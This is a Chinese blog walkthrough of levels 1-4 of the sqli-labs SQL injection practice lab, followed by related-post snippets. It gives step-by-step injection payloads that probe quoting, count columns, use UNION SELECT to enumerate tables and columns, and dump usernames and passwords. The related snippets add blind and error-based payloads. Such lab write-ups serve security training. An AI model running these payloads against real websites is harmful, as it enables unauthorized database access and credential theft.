sqli-labs通关攻略(1-4关)

已于 2025-02-27 19:56:38 修改
阅读量297 收藏 5
点赞数 5
文章标签: 网络安全 sql
于 2025-02-26 19:07:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_64470109/article/details/145884506
版权

一、less-1

1、题目的意思是:请输入一个ID作为参数,并且输入一个数值

2、利用“?”来进行传参(下图,传参成功)

3、判断注入类型以及闭合方式

?id=1 and 2=2   #正常
?id=1 and 1=2   #正常   说明一定不是数字型注入,考虑其他注入方式
?id=1'          #报错   可能是字符型注入
?id=1'--+       #正常   输入注释符号--+闭合成功,是字符型注入

4、确定字段数量(用二分法)

?id=1' order by 4 --+   #报错,说明字段数量不是4
?id=1' order by 3 --+   #不报错,说明字段数量是3

5、确定回显点

?id=-1' union select 1,2,3 --+   #可以看到输出显示的字段为2和3

6、确定数据库名

可以看到数据库的名字为security

7、确定数据库里所有的表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

8、找到里面重要的表进行查询字段,这里我们查询users表的字段

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

9、查询所有字段的数据

?id=-1' union select 1,2,group_concat(id,'-',username,'-',password) from users--+

二、less-2

1、判断注入类型

?id=1'  #报错,不是字符型注入
?id=1 and 1=1  #正常
?id=1 and 1=2  #报错(空白界面)
确定为数字型注入

2、判断字段数量

?id=1 order by 4    #报错,说明没有四个字段
?id=1 order by 3    #正常,说明有三个字段

3、确定回显点

?id=-1 union select 1,2,3   #正常,确定了回显点为2和3

4、爆破库名

?id=-1 union select 1,2,database()

5、爆破表名

?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'

6、爆破字段名

?id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'

 7、爆破数据

?id=-1 union select 1,2,group_concat(username,'~',password)from users

三、less-3

1、判断注入类型

?id=1'  #报错说明有可能是他的闭合方式
?id=1' --+   #报错,说明不是他的闭合方式
?id=1"  #正常,说明不是他的闭合方式
?id=1')  #报错,说明有可能是他的闭合方式
?id=1') --+   #没报错,说明就是他的闭合方式,为字符型注入

2、确定字段数量

?id=1') order by 4 --+   #报错,说明字段数量不是4
?id=1') order by 3 --+   #不报错,说明字段数量是3

3、确定回显点

?id=-1') union select 1,2,3 --+   #可以看到输出显示的字段为2和3

4、爆破库名

?id=-1') union select 1,2,database() -++   #可以看到库名为security

5、爆破表名

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+   #可以看到表名都出现了

6、爆破字段名

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+    #可以看到字段名已经出现了

7、爆破数据

?id=-1') union select 1,2,group_concat(username,'~',password) from users --+
爆破成功

四、less-4

1、判断注入类型

?id=1 and 1=1   #没报错,说明有可能他的注入方式为数字型
?id=1 and 1=2   #没报错,说明他的注入方式不是数字型,可能是字符型
?id=1'          #没报错,说明这不是他的闭合方式
?id=1"          #报错,说明有可能是他的闭合方式
?id=1" --+      #报错,说明不是他的闭合方式
?id=1")         #报错,说明有可能是他的闭合方式
?id=1") --+     #没报错,说明这就是他的闭合方式,并且是字符型注入

2、确定字段数量

?id=1") order by 4 --+   #报错,说明字段数量不是4
?id=1") order by 3 --+   #不报错,说明字段数量是3

3、确定回显点

?id=-1") union select 1,2,3 --+   #可以看到输出显示的字段为2和3

4、爆破库名

?id=-1") union select 1,2,database() --+   #可以看到库名为security

5、爆破表名

?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+   #可以看到表名都出现了

6、爆破字段名

?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+    #可以看到字段名已经出现了

7、爆破数据

?id=-1") union select 1,2,group_concat(username,'~',password) from users --+
爆破成功

Sqli-lab教程-史上最全详解(1-22通关
qq_52364123的博客
04-10 1万+
sql注入集合
SQLi-labs-Master(1-22)新手通关宝典
Myosotis_LL的博客
05-18 3041
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入(SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
sqli-labs通关攻略(全卡)(更新中~)
C233333235的博客
07-22 1530
7.然后就要进行表名的查询,此处在2的位置用group_concat(table_name),3 from information_schema.tables where table_schema='security'语句进行查询,group_concat的作用是将查询出的表名显示到一行,不然只能显示第一个表名。(别忘了在参数1前面加-,主要是为了使参数变为一个不存在的参数,任何过大的数字或负数,以及小数,科学计数法数字都可以),在这里确定其回显位置为2和3。1.打开卡,提示我们将参数id填入url中。
sqli-labs通关攻略
ljh123321ljh的博客
03-02 673
id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),1,1))>1,sleep(2),1)--+判断其表中第二个字段的第一个字符。id=1' and if(ascii(substr(database(),1,1))>115,sleep(2),1)--+,判断第一个字符为s.
sqli-labs通关攻略卡 简单易懂(持续通关中~)
starhei.zxy的博客
07-22 464
查列:union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+确定有3列了 因为order by 4 的时候页面出错了 接着id=-1' union select 1,2,3 --+ 看一下回显点。id=-1' union select 1,database(),3 --+加个单引号 闭合判断一下。
Sqli-labs通关教程(手工注入+工具使用sqlmap)
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
sqli-labs通关攻略
网安小白
07-22 661
第七步 查看users表中username,password的数据。这里存放着运行出来的数据,以表格的方式呈现。第六步 查看user表中列。根据显示,应该有四个字段。第三步 查看回显位置。
Sqli_labs通关全解--总结
cyynid的博客
01-09 2312
Sqli_labs通关全解
sqli-labssqli-labs 靶场通关1-16)
m0_71944965的博客
09-02 646
🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】sqli-labs 靶场通关1-16)sqli-labs第一 sqli-labs第一 输入?id=1 正常 输入?id=1' 报错 输入?id=1'--+ 正常 判断有注入点且闭合方式是 ’ 使用and ‘1’='1判断他为字符型注入 ?id=1' order by 3--+ 正常 ?id=1' order by 4--+ 报错 判断回显位有三个。 id=0
sqli-labs 1-22 通关手册
XiaoYu_xixi的博客
05-18 1891
sqli-labs是一个印度程序员写的一个SQL注入的靶场,一共有65个卡,其中卡的类型有但不限于。此处和 Less-18 一样,只是,这里的uagent 换成了 HTTP_REFERER所以同样存在注入,Less-2 是数字型注入(intiger),Less-1 是字符型注入(string)联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过。输入 11' 时没有反应, 1" 则报错,可以判断是双引号注入,且有括号。所以闭合需要考虑单引号和括号。
sqli-labs通关记录
最新发布
03-06
整个sqli-labs通关过程,除了教会如何识别和利用SQL注入漏洞外,还涉及到了数据库系统的相知识,如SQL语句的构造、数据库函数的运用、布尔盲注和报错注入的技巧等。掌握这些技巧能够帮助开发者更好地了解和防范...
Sqli-labs靶场通关1-20
2301_77977773的博客
07-03 1039
为了不影响 80 端口的服务,我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务,我们可以不使用 php-study 配置中的 MySQL,就用主机本身即可,但版本可能需要注意,我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件。
【详细】 Sqli-labs1~65 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 4万+
【详细】 Sqli-labs1~65 通关详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs通关攻略教程一(less 01~less 02)
m0_55854679的博客
06-12 392
数据库知识整理 MYSQL基本用法 查库 show databases; ##方法1 select schema_name from information_schema.schemata; ##方法2 2. 查表 use security; ##方法1 show tables; select table_name from information_schema.tables where table_schema='security' ##方法2 3. 查列 se
sqli-labs通关1-5
09-03
sqli-labs是一个SQL注入学习平台,通过完成一系列的卡来学习和实践SQL注入漏洞的利用方法。根据引用的描述,首先需要在浏览器中打开"http://127.0.0.1/sqli-labs/",访问平台的首页。然后点击"Setup/reset Database"按钮以创建数据库,创建表并填充数据。 完成了上述设置后,可以开始挑战卡。 sqli-labs通关1:根据引用提供的内容,可以在URL中加入"?sort=1 and (updatexml(1,concat(0x5c,(select group_concat(password,username) from users),0x5c),1))"来进行注入。这样就能够获取到users表中的密码和用户名的组合。 sqli-labs通关2:根据引用提供的内容,可以在账户密码后面加入"1',updatexml (1,concat(0x5c,(select group_concat(username,password) from users),0x5c),1))#"来进行注入。这样就能够获取到users表中的用户名和密码的组合。 sqli-labs通关3通关3的方法没有在提供的引用中找到相信息。 sqli-labs通关4:根据引用提供的内容,可以在URL中加入"?sort=1 and (updatexml(1,concat(0x5c,(select group_concat(password,username) from users),0x5c),1))"来进行注入。这样就能够获取到users表中的密码和用户名的组合。 sqli-labs通关5通关5的方法没有在提供的引用中找到相信息。 请注意,为了安全起见,在进行实际操作时,请确保仅在合法和授权的环境中进行,并遵守法律和道德规范。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [详细sqli-labs1-65)通关讲解](https://blog.youkuaiyun.com/dreamthe/article/details/123795302)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [Sqli-labs通关全解---Sqli-lab--1](https://blog.youkuaiyun.com/cyynid/article/details/128629421)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值